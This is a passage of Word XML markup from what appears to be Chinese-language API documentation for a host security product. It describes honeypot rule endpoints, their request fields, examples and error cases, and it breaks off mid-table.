              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB9DA4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62007F66" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA6D869" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC8EFA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9E2298" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16A20E04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03EDA3CB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="482464FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37431E32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EA274D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F28539" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C3BFDCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB14C2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02C46BB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4464E747" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E09778B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07018B1A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2484169C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A642B9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FEA6181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DAB7DB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="597134CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="614226D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41D890AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C32E16A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36FE6B90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D981584" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67036CDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09747D08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54ED6376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320D919E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E7E4EDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc115166237"/>
      <w:bookmarkStart w:id="330" w:name="创建单条规则"/>
      <w:bookmarkEnd w:id="328"/>
      <w:r>
        <w:t>创建单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w14:paraId="2EA40299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐设置主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650475A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77229235" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044FF5D7"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54"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2398"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="00A2125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A96F2E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF056F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E440DAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03CD938C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69A3B2A2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A65B16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D013FC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F859A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3993795D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AC71E19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4808E67D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187F29FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617AD448" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="402EB449" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口，限制不能超过5个</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23DA8D29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12661CD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ports": [8060,10020]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D0765" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19CBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6B9A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C2D74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D89E6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364262A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机规则已经存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCED30B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则端口为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38831FF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则端口个数大于5个，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D3D51"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BC669E" w14:paraId="39E8A51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ED5FAF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42095B20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF9B775" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360005BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29DC3EE8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D1201C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DAFF65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A847FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08290CC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0166137E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="331" w:name="_Toc115166238"/>
      <w:bookmarkStart w:id="332" w:name="批量创建规则"/>
      <w:bookmarkEnd w:id="330"/>
      <w:r>
        <w:t>批量创建规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w14:paraId="440667A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐批量创建主机规则功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C2F87D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C3A6A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD4D4E"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802"/>
        <w:gridCol w:w="1159"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="6162"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="04D0F15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6EB6DBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00DE0C03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617F7779" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7217597C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2180551B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC87EC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB4C47A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE265E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016BD969" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:全部主机 1:自定义，包括业务组和主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FD90BB1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534DBCFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6857DC29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
